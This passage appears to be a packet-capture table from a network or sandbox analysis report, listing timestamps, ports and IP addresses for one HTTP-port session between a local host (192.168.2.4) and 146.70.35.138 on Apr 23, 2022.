Apr 23, 2022 08:12:20.575176001 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575196028 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575232983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575243950 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575258970 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575280905 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575297117 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575333118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575344086 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575361013 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575378895 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.575397968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.575443029 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.585979939 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.586055994 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.614809036 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.614859104 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.614887953 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.614926100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.614953995 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.614955902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.614994049 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.614998102 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615000963 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615478992 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615521908 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615550041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615552902 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615573883 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615590096 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615634918 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615827084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615866899 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615890980 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615895987 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615911961 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.615937948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.615988016 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.616008043 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.616049051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.616051912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.616075993 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.616096020 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.616142035 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.616189003 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.621948004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.621989965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.622016907 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.622056961 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.622097015 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.622147083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.622201920 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.638639927 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.638742924 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657005072 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657063961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657090902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657114029 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657123089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657160044 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657176018 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657186031 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657212973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657233953 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657349110 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657383919 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657407999 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657413006 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657426119 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657466888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657500982 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657516003 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657527924 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657543898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657629013 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657663107 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657685041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657685995 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657712936 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657720089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657757998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657774925 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657780886 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657798052 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657901049 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657934904 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657949924 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.657960892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.657979965 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.658124924 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658159971 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658174038 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.658215046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658232927 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.658361912 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658396959 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658418894 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.658421040 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.658428907 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.662350893 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.662430048 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698306084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698357105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698399067 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698427916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698467970 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698508978 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698546886 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698574066 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698613882 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698613882 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698651075 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698656082 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698674917 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698692083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698704958 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698720932 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698761940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698795080 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.698807955 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.698842049 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.776896954 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.800626993 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151750088 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151791096 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151819944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151839018 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151865005 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151890993 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151916027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151933908 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151958942 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.151981115 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.151984930 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.152013063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.152030945 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.152031898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.152045965 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.152050972 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.152076006 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.152092934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.191756964 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.191807032 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.191836119 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.191871881 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.191878080 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.191915035 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.191930056 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.191934109 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.191953897 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.191955090 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192009926 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192009926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192038059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192061901 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192137003 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192178011 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192213058 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192222118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192238092 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192260981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192301035 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192313910 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192331076 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192358017 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192400932 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192442894 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192456961 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192470074 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192497969 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192509890 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192540884 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.192564011 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.192586899 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.231730938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231781960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231817007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231880903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231909037 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231935024 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.231950998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231980085 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.231992006 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232021093 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232122898 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232151985 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232172966 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232187033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232191086 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232269049 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232482910 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232541084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232568979 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232570887 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232610941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232629061 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232664108 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232671976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232719898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.271845102 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271897078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271924973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271928072 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.271966934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271967888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272027969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272028923 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272062063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272087097 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272104025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272146940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272154093 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272175074 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272202015 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272217989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272258997 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272260904 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272286892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272310019 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272387981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272443056 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272449017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272504091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272659063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272723913 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272727013 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272761106 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272780895 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272820950 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272861004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272871017 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272923946 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.311638117 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311677933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311692953 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311712027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311734915 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311748981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311892033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.311938047 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312145948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312172890 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312189102 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312232018 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312515974 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312540054 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312556982 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312581062 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312598944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312623024 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312671900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312839985 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312865019 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312880039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312903881 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312907934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312927961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312944889 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312959909 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313005924 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313044071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313069105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313082933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313112974 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313148975 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313199997 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313252926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.351893902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.351959944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.351999998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352032900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352050066 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352075100 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352091074 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352133036 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352174997 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352294922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
